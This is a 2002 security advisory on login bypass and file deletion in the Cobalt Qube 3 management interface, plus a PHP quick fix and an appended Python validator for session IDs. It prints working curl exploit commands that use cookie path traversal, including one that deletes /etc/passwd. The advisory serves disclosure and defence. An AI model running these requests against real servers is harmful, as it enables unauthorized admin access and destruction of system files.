SCAN Associates Sdn Bhd Security Advisory

Product: Cobalt Qube 3 (Cobalt Linux release 6.0 (Carmel), Kernel 2.2.16C7 on an i586)
Date: 23rd July 2002
Summary: Login bypass
Author: pokleyzz, sk, shaharil

Description
===========

First of all, we would like to thank Sun Microsystems (Malaysia) for sponsoring a Cobalt Qube 3 server during the recent HackInTheBox Capture the Flag Security Conference on 16-17 July 2002. Being the winners, we are proud to receive this cool box.

After playing around for a while, we found several problems in the Cobalt Qube 3 System Management. The most serious bug may allow remote access as Admin. We alerted security-alert@sun.com and Sun Microsystems (Malaysia) on 19th July, but unfortunately we did not receive any feedback.

Details
=======

Problem 1: Local Privilege Escalation to Admin

Any user with the ability to create a file anywhere on a Cobalt server can promote themselves to Admin access in the System Management. The sessionId cookie is used as a path to the session file, and it is not checked for directory traversal, so a user may create a file at /tmp/test and craft a cookie to log in as Admin without a password.

Create a dummy session file on the Cobalt server:

    $ printf "admin" > /tmp/test

Log in without a password from anywhere:

    $ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin http://192.168.0.1:444/splashAdmin.php

Problem 2: Remote User Access

We also found that if the User account is newly created, the authentication can be bypassed without creating a dummy session file on the server, because an existing file under the object database already holds the needed content:

    $ curl -b sessionId=../codb/objects/4/.name\;loginName=admin http://192.168.0.1:444/splashAdmin.php

Problem 3: Remotely Delete a File

It is possible to delete a file from the server by specifying the path to the file in the sessionId cookie and the first 31 characters of the file's contents in the loginName cookie. The following example will delete the /etc/passwd file from the server:

    $ curl -b sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash http://192.168.0.1:444/splashAdmin.php

Quick Solution
==============

/usr/sausalito/ui/libPhp/ServerScriptHelper.php line 64:

    $sessionId = ereg_replace("\.\.","",$sessionId);

* curl can be downloaded from http://curl.haxx.se/download.html

www.scan-associates.net
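The quick solution above strips the ".." substring from the cookie value, which is a blacklist fix: it transforms a hostile value rather than rejecting it. The following is an added illustration, written in Python rather than the product's PHP and not code from Cobalt or from the advisory's authors, of the stricter check a session store would normally apply: allowlist the session ID format, then resolve the path and confirm it still lies inside the session directory. The session directory name and the 32-hex-character ID format are assumptions made for the demo; the three cookie values checked are the ones quoted in the advisory.

```python
import os
import re
import tempfile
from typing import Optional

# Constructed session directory for the demo (assumed; not the Qube 3's real path).
SESSION_DIR = os.path.join(tempfile.gettempdir(), "demo_sessions")

# Allowlist: a session ID is an opaque token of exactly 32 lowercase hex characters (assumed format).
SESSION_ID_RE = re.compile(r"[0-9a-f]{32}")

# The three sessionId cookie values quoted in the advisory.
ADVISORY_COOKIES = [
    "/../../../../../../tmp/test",          # Problem 1: attacker-created session file
    "../codb/objects/4/.name",               # Problem 2: existing file with usable content
    "../../../../../../../../etc/passwd",    # Problem 3: file targeted for deletion
]


def strip_dotdot(session_id: str) -> str:
    """Mirror of the advisory's quick fix: delete every '..' substring.

    This rewrites the value instead of refusing it, so whatever remains is
    still handed to the filesystem."""
    return session_id.replace("..", "")


def session_path(session_id: str) -> Optional[str]:
    """Return the on-disk path for a valid session ID, or None if it is rejected.

    Two independent checks:
      1. the ID must match the allowlisted token format, so path separators,
         dots and slashes never reach the filesystem layer;
      2. the resolved path must sit directly inside SESSION_DIR, which guards
         against any traversal or symlink trick the first check might miss."""
    if SESSION_ID_RE.fullmatch(session_id) is None:
        return None
    base = os.path.realpath(SESSION_DIR)
    candidate = os.path.realpath(os.path.join(base, session_id))
    if os.path.dirname(candidate) != base:
        return None
    return candidate


def classify(session_id: str) -> str:
    """Label a cookie value as 'accepted' or 'rejected' by session_path()."""
    return "accepted" if session_path(session_id) is not None else "rejected"


def check_advisory_cookies() -> dict:
    """Run every advisory cookie value through both approaches for comparison."""
    return {
        cookie: {"after_strip": strip_dotdot(cookie), "allowlist": classify(cookie)}
        for cookie in ADVISORY_COOKIES
    }


if __name__ == "__main__":
    for cookie, result in check_advisory_cookies().items():
        print(f"{cookie!r}: quick fix leaves {result['after_strip']!r}, allowlist -> {result['allowlist']}")
    print("legitimate id ->", classify("0123456789abcdef0123456789abcdef"))
```

Running the block shows that the quick fix turns "../codb/objects/4/.name" into "/codb/objects/4/.name", a value that is still a path, while the allowlist check rejects all three advisory cookies outright and accepts only a well-formed token; the containment check in session_path is the second line of defence in case the ID format is ever loosened.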